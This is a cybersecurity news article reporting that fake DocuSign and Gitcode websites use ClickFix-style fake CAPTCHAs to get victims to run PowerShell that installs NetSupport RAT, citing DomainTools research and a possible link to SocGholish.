Recommended reading

Fake DocuSign and Gitcode sites are tricking victims into downloading malware - here's what you need to know

News
By published

A new spin on ClickFix has been discovered

Digital image of a lock.
Image Credit: Shutterstock (Image credit: Shutterstock)
  • Threat actors are creating fake DocuSign and Gitcode websites
  • The sites come with fake CAPTCHA and other scam mechanisms
  • Victims are tricked into downloading a Trojan

Security researchers have found fake Gitcode and DocuSign websites distributing remote access trojan (RAT) malware using the infamous ClickFix method.

Experts from DomainTools Investigations (DTI) found “malicious multi-stage downloader Powershell scripts” hosted on spoofed websites inviting visitors to pull up the Windows Run terminal and run a script copied into their clipboard.

"Upon doing so, the powershell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them eventually installing NetSupport RAT on the infected machines,” the researchers said in their report. These multiple stages and downloads are designed to evade detection, and help the campaign “be more resilient to security investigations and takedowns."

SocGholish

They also said they don’t know exactly how victims end up on these websites. However, it is safe to assume that social engineering, email spam, and possibly malvertising, are a part of the methodology. In some cases, the fake websites also come with a fake CAPTCHA verification mechanism which, to be solved, requires the victims copy and paste a code into the Run program, effectively downloading the malware.

TDI could not confirm the identity of the attackers, but did stress it had observed a similar campaign late in 2024, which was attributed to SocGholish:

"Notably, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, Storm-0408, and others,” the report concluded.

SocGholish, also known as FakeUpdates, is known for its fake browser and fake software update alerts. After compromising a website, the crooks would inject a popup, notifying the visitors that their browser, or operating system, needs “fixing” or “updating”.

This is the “original” ClickFix method, one that spun from the ancient “you have a virus” popup that imitated popular antivirus programs and delivered - viruses.

Via The Hacker News

You might also like

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.